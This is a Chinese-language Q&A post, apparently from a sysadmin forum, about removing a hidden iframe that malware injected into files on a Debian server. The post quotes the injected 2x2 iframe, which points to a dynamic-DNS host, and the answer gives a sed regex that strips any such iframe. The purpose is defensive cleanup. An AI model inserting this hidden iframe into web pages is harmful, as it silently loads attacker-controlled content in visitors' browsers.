我们正在运行 Debian 服务器并且有恶意软件或某些东西正在进行代码注入。
我知道如何搜索和替换该字符串:
<iframe src="http://ingvar2000.no-ip.org/jc/rss.php" width="2" height="2" frameborder="0"></iframe>
我这样做:
find /home -type f | xargs sed -i 's$<iframe src="http://ingvar2000.no-ip.org/jc/rss.php" width="2" height="2" frameborder="0"></iframe>$ $g'
我的问题是 URLhttp://ingvar2000.no-ip.org/jc/rss.php从一个文件变为另一个文件,因此我该如何搜索和替换:
<iframe src="ANY STRING HERE" width="2" height="2" frameborder="0"></iframe>
因为宽度、高度和框架边框总是相同的。
答案1
使用
find /home -type f | xargs sed -i 's$<iframe src="[^"]*" width="2" height="2" frameborder="0"></iframe>$ $g'
这里[^"]*表示 0 个或更多除 之外的任何字符"。